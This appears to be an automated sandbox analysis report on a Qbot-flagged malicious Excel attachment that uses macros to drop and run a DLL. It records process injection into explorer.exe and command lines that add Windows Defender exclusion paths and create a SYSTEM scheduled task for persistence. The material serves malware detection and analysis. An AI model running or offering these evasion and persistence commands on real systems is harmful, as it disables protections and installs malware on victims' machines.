Source: Document image extraction number: 0, Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1, Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 PROTECTH)WARNNG Thisfileor
Source: Document image extraction number: 1, Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
Source: Document image extraction number: 1, Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_000D6EB0
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_000D2346
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_000D1758
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_000D4FC0
Source: CompensationClaim-1033191014-09282021.xls, OLE, VBA macro line: Sub auto_open()
Source: CompensationClaim-1033191014-09282021.xls, OLE, VBA macro line: Sub auto_close()
Source: CompensationClaim-1033191014-09282021.xls, OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: CompensationClaim-1033191014-09282021.xls, OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
Source: Drezd.red.14.dr, Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr, Static PE information: No import functions for PE file found
Source: C:\Windows\SysWOW64\explorer.exe, Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
Source: CompensationClaim-1033191014-09282021.xls, OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe, Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\System32\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exe, Console Write: ....................<............&9.....(.P.............|.......l.......2.......................................................................
Source: C:\Windows\System32\reg.exe, Console Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Windows\System32\reg.exe, Console Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........".....N.......(...............
Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe, Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE9D1.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,
                        Source: CompensationClaim-1033191014-09282021.xlsOLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{6845EBB9-4AF7-4E56-9BB0-ADF569578E37}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{0F905B6A-A27C-4BE3-8678-0B5BD602A8CF}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{86C9B554-6D2D-4099-AD4E-D96AE07D5551}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6845EBB9-4AF7-4E56-9BB0-ADF569578E37}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{0F905B6A-A27C-4BE3-8678-0B5BD602A8CF}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{86C9B554-6D2D-4099-AD4E-D96AE07D5551}
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.618389279.00000000026B0000.00000004.00000040.sdmp, explorer.exe, 0000000E.00000003.634893726.0000000001350000.00000004.00000040.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02A8455B push edx; mov dword ptr [esp], 00000003h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02A8455B push edx; mov dword ptr [esp], 00F00000h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02A81000 push eax; mov dword ptr [esp], 000FFFFFh
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00099D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00099E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_01311000 push eax; mov dword ptr [esp], 000FFFFFh
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0131455B push edx; mov dword ptr [esp], 00000003h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0131455B push edx; mov dword ptr [esp], 00F00000h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10019D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10019E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DA00E push ebx; ret
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DD485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DD4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D9D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000D9E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000DBB29 push esi; iretd
                        Source: 44467.9218096065[1].dat.0.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.0.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.7.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.14.drStatic PE information: section name: .rdatat
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

                        Persistence and Installation Behavior:

                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat
                        Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red

                        Boot Survival:

                        Drops PE files to the user root directory
                        Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Drezd.red
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

                        Hooking and other Techniques for Hiding and Protection:

                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2980 base: 29102D value: E9 BA 4C DF FF
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2136 base: 29102D value: E9 BA 4C E3 FF
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1308 | Thread sleep count: 50 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 1612 | Thread sleep time: -100000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1708 | Thread sleep count: 53 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2580 | Thread sleep count: 69 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2580 | Thread sleep time: -88000s >= -30000s
                        Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,
                        Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00085A61 RtlAddVectoredExceptionHandler,
                        Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_000C5A61 RtlAddVectoredExceptionHandler,

                        HIPS / PFW / Operating System Protection Evasion:

                        Maps a DLL or memory area into another process
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 29102D
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 29102D
                        Allocates memory in foreign processes
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2980 base: B0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2980 base: 29102D value: E9
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2136 base: F0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2136 base: 29102D value: E9
                        Yara detected hidden Macro 4.0 in Excel
                        Source: Yara match | File source: CompensationClaim-1033191014-09282021.xls, type: SAMPLE
                        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: explorer.exe, 00000007.00000002.881631328.0000000000C40000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.881631328.0000000000C40000.00000002.00020000.sdmp | Binary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.881631328.0000000000C40000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_000831C2 CreateNamedPipeA,
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                        Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

                        Stealing of Sensitive Information:

                        Yara detected Qbot
                        Source: Yara match | File source: 6.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 13.2.regsvr32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 13.2.regsvr32.exe.2a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.632447302.00000000002A0000.00000004.00000001.sdmp, type: MEMORY

                        Remote Access Functionality:

                        Yara detected Qbot
                        Source: Yara match | File source: 6.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 13.2.regsvr32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
